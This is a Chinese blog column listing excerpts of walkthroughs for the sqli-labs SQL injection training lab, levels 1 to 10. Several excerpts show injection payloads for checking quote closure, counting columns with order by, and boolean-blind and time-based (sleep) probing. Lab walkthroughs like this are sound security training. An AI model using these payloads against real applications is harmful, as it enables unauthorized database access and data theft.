sqli-labs
文章平均质量分 51
阿刁〇하
这个作者很懒,什么都没留下…
展开
-
sqli-labs less-10
文章目录sqli-labs less-10* 判断注入sqli-labs less-10本关和第9关类似,只是注入存在区别* 判断注入?id=1‘ and sleep(5) --+ 延时2秒?id=1" and sleep(5) --+ 延时7秒故注入方式为双引号闭合接下来的步骤与第九关相同,就不多做赘述...原创 2021-04-02 09:00:04 · 57 阅读 · 0 评论 -
sqli-labs less-9
文章目录sqli-labs less-9* 判断注入* 判断列数* 查询详细信息sqli-labs less-9本关和前几关的注入方式又不一样,不过我们还是按步骤来* 判断注入首先输入?id=1 回显正常?id=1' 回显正常?id=1" 回显正常由此可知,本关没有布尔类型状态,输入语句的正确与否回显均为You are in…,故本关采用延时注入的方式我们需要用到sleep函数?id=1' and (sleep(5)) --+ 耗时7秒?id=1 and (sleep(5))原创 2021-04-01 22:31:55 · 133 阅读 · 0 评论 -
sqli-labs less-8
文章目录sqli-labs less-8* 判断注入* 判断列数* 查询详细信息sqli-labs less-8* 判断注入?id=1 回显正常?id=1' 回显异常说明闭合方式中含有单引号接下来用and判断是否为单引号闭合?id=1' and 1=1 --+ 回显正常?id=1' and 1=2 --+ 回显异常由此可知,本关为单引号闭合方式* 判断列数?id=1' order by 3 --+ 回显正常可知,列数为3* 查询详细信息本关依然采用布尔盲注的方原创 2021-03-31 23:36:28 · 76 阅读 · 0 评论 -
sqli-labs less-7
文章目录sqli-labs less-7* 判断注入* 判断列数* 查询详细信息sqli-labs less-7* 判断注入?id=1 回显信息为 You are in.... Use outfile......?id=1' 回显错误?id=1" 回显正常输入单引号报错接下来尝试?id=1' --+ 回显错误尝试加入)?id=1') --+ 回显错误?id=1')) --+ 回显正常可知本关为’))的闭合方式* 判断列数?id=1')) order原创 2021-03-31 23:07:17 · 109 阅读 · 0 评论 -
sqli-labs less-6
文章目录sqli-labs less-6* 判断注入* 判断列数* 查询详细信息sqli-labs less-6本关和第5关类似,可以参考第5关* 判断注入?id=1 回显信息为You are in…………?id=1' 回显正常?id=1" 回显错误?id=1") 回显正常故注入类型为字符型,双引号闭合* 判断列数?id=1" order by 3 --+ 回显正常?id=1" order by 4 --+ 回显错误故列数为3* 查询详细信息本关同第五关相似,依然采原创 2021-03-31 22:07:40 · 127 阅读 · 0 评论 -
sqli-labs less-5
文章目录sqli-labs less-5* 判断注入* 判断列数* 查询详细信息sqli-labs less-5第五关和前面的几关不同* 判断注入输入?id=1 回显信息为You are in……判断注入类型输入?id=1' 根据报错信息可知,注入类型为字符型输入?id=1' --+ 回显正常由此可知,闭合方式为’)* 判断列数输入?id=1') order by 3 --+ 回显正常输入?id=1') order by 4 --+ 回显错误故字段数为3,有3列*原创 2021-03-30 23:57:03 · 319 阅读 · 0 评论 -
sqli-labs less-4
文章目录sqli-labs less-4* 判断注入* 判断列数* 报显示位* 查询详细信息* 查询当前数据库和版本* 查询库下的表* 查询表下的列* 输出最终查询到的信息sqli-labs less-4* 判断注入输入?id=1' 回显正常输入?id=1" 回显错误输入?id=1' and 1=1 --+ 回显正常输入?id=1' and 1=2 --+ 回显正常输入?id=1") and 1=1 --+ 回显正常输入?id=1") and 1=2 --+ 回显**错误**原创 2021-03-29 17:13:47 · 79 阅读 · 0 评论 -
sqli-labs less-3
文章目录sqli-labs less-3* 判断是否存在注入* 判断列数* 报显示位* 查询详细信息* 查询当前数据库和版本* 查询数据库下的表* 查询表下的列* 输出最终查询到的信息sqli-labs less-3* 判断是否存在注入输入?id=1 回显正常输入?id=1' 回显错误输入?id=1" 回显正常但根据回显信息,此题是由’)来进行闭合的,所以尝试输入’)进行闭合输入?id=1') and 1=1 --+ 回显正常输入?id=1') and 1=2 --+ 回显错误原创 2021-03-29 11:08:49 · 170 阅读 · 2 评论 -
sqli-labs less-2
文章目录sqli=labs less-2*判断是否存在注入* 判断列数* 报显示位* 查询详细信息* 查询具体内容* 查询security库下的表* 查询表中的列* 输出最终查询到的信息sqli=labs less-2*判断是否存在注入输入?id=1 回显正常输入?id=1' 回显错误输入?id=1 and 1=1 回显正常输入?id=1 and 1=2 回显错误说明存在整数型注入点页面未报错,查询结果为空,表明存在注入点,and查询被直接代入到了原查询语句中,可以直接在后面进原创 2021-03-28 12:06:54 · 146 阅读 · 0 评论 -
sqli-labs less-1
文章目录sqli-labs less-1sqli-labs less-1判断是否存在注入输入?id=1 回显正常输入?id=1’ 回显错误由此判断出此题是基于单引号注入然后用and判断输入?id=1’ and 1=1 --+ 回显正常输入?id=1’ and 1=2 --+ 回显错误猜测字段的数量,根据传入id最终查询到的结果列数输入?id=1’ order by 3 --+ 回显正常(–+ 是为了注释掉后面的代码)输入?id=1’ order by 4 -原创 2021-03-27 21:01:49 · 83 阅读 · 0 评论